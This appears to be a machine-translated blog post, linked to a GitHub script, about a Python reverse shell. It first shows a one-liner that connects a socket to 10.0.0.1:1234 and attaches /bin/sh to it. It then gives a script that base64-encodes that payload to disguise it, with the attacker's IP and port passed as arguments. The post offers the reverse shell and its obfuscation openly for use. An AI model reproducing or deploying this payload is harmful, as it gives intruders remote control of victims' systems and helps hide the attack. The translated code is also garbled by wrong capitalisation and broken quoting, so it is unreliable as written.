Address: https://github.com/donghouhe/python_fantan_shell_encode/blob/master/netcat_encode.py If you think you can, dot a star to encourage you.
This is a primitive order.
1 |
python - C ' Import Socket,subprocess,os;s = Socket.socket (Socket.af_inet,socket. SOCK_STREAM); S.connect ("10.0. 0.1 ″, 1234 ) ); Os.dup2 (S.fileno (),0); Os.dup2 (S.fileno (),1); Os.dup2 (S.fileno (),2);p=subprocess.call (["/bin/sh" , "-i"]); ' |
Once run, a shell bounces back to the attacker's computer.
But, it doesn't look good enough ... Hyun, do you understand me?
So, I'm going to encode the code base64, make him look more cool, I finished;
"' data:2015.2.2 Author: ____ __ __ __ __/\ _ ' \ /\ \/\ \ /\ \/\ \ \ \ \/\ \ ___ ___ __\ \ \_\ \ ___ __ __\ \ \_\ \ __ \ \ \ \/__ ' \/' _ ' \/' _ ' \ \ _ \/__ ' \/\ \/\ \ \ _ \/' __ ' \ \ \ \_\ \/\ \l\ \/\ \/\ \/\ \l\ \ \ \ \ \/\ \l\ \ \ \_\ \ \ \ \/\ __/\ \____/\ \____/\ \_\ \_\ \____ \ \_\ \_\ \____/\ \____/\ \_\ \_\ \____ \/_ __/\/___/\/_/\/_/\/___l\ \/_/\/_/\/___/\/___/\/_/\/_/\/____//\____/ \_/__/' from base64 import Encodestringfrom sys import Argvtry:print "python-c \" exec (__import__ (' base64 '). Decodestring (", ' \ ' + encodestring (" s=__import__ (' socket '). Socket (__import__ (' socket '). AF_INET,__IMPORT__ (' socket '). SOCK_STREAM); S.connect ((' {} ', {})); __import__ (' OS '). Dup2 (S.filenO (), 0); __import__ (' OS '). Dup2 (S.fileno (), 1); __import__ (' OS '). Dup2 (S.fileno (), 2); p=__import__ (' subprocess '). Call (['/bin/sh ', '-I ']) ". Format (Argv[1], argv[2]). replace (' \ n ', ' \\n ') + ' \ ', ') ') \" "# = I couldn ' t use str1 + str2except:print ' usage:python nc.py IP Port '
It's a bit of a payload.
3 pictures See effect
No less in combat.
"Python" Let me code a sentence for the shell to bounce.